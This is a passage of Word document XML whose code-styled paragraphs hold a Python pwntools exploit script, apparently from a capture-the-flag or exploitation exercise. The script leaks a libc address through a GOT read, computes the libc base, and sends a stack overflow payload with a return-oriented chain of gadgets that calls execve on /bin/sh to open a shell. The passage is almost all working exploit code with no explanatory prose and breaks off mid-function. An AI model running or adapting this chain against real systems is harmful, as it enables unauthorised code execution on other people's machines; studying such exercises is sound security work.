          <w:p w14:paraId="0FDBFB91" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x000000000003f587 : pop rax ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054EA207" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>g = libcBase + 0x003f587</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34AA8A6F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("popRAX - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D8D9E64" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRAX = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D02228C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x0000000000026468 : syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25F3FB86" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>g = libcBase + 0x0026468</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C051308" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("syscall - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B7DB19" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>syscall = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5D029B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2439DAD0" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Data for the stack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A8C239F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># /bin/sh address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3F5E3B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>binSh = libcBase + 0x0019604f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="130EE49D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datRDI = p64(binSh)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D651315" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datRSI = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6999E15F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>junk = p64(0xdeadbeef)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F67E40F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datRDX = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA4F887" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>datRAX = p64(0x3b)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56DF2E28" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AFA8993" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#pltPuts = p64(binary.plt.puts)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address to call</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="087CAC77" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#gotGets = p64(binary.got.gets)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F0FF76" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05852E7C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#mainAddr = p64(0x00400621)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address of first line in main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6154EBA4" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11E0CCF2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="782315A2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7501F11E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668C031B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld += retGdgt + popRDI + datRDI + popRSI + datRSI + junk + popRDX + datRDX + popRAX + datRAX + syscall + retGdgt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="246022B7" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#pld += retGdgt + popRDI + gotGets + pltPuts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17207C48" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#pld += mainAddr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="544C99AA" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return pld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B001DA" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1043BBAD" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def pwnLocal(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11838729" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE4E2EB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.clean(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50E245F5" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A2BA1F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(mainLinePld())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64CB033D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.recvuntil("Breakpoint")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B481C0B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7868A683" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.clean(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C8EB98" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.sendline("c")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="740317BB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B26841" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>print(p.recvline())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18566141" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#print(p.recvline())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44DDB3B5" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08441055" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t>addr = p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36333DBC" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66D41941" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak = u64(addr.ljust(8, b'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D9C926" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#leak = u64(addr.ljust(8, b'a'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B069E48" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># There's an extra a at the beginning for no reason</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F30426" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak -= 0xa000000000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F31766" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("gots leak - " + hex(leak))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D5659E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DA835C4" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#libcBase = leak - 0xf7a50 + 0x100000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59237219" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>libcBase = leak - 0x75050</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FDD1760" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("libcBase - " + hex(libcBase))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD6A61A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08AF0053" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CAC3191" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(pwnPLD_libc6(libcBase))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34F6511B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
